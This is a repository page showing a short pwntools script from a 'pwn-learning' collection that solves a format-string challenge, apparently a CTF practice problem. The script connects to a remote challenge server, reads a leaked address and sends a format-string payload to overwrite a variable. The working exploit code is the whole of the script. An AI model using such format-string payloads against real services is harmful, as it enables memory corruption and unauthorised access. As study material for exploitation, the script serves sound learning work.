bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
befe99ac8710226a70cb1a5db23c0022192cafc6
pwn-learning/FormatString/attachment-31/answer.py
Jack Ren 39718ef2c1 Added 5 problems and solutions
2022-05-11 18:07:40 +08:00

28 lines
549 B
Python
Executable File
Raw Blame History

#!/usr/bin/env python2
from pwn import *
from LibcSearcher import *
from struct import pack
import os, base64, math, time
context(arch = "i386",os = "linux", log_level = "debug")
p = remote("123.57.69.203", 5310)
# p = process('./attachment-31')
elf = ELF('./attachment-31')
# gdb_command = ""
# gdb.attach(p, gdb_command)
# time.sleep(2)
x_addr = int(p.recv(10), 16)
log.info(hex(x_addr))
for _ in range(3):
p.sendline("1")
p.recvuntil("What's your name?\n")
payload = fmtstr_payload(10, {x_addr: 9})
p.sendline(payload)
p.interactive()
Reference in New Issue View Git Blame Copy Permalink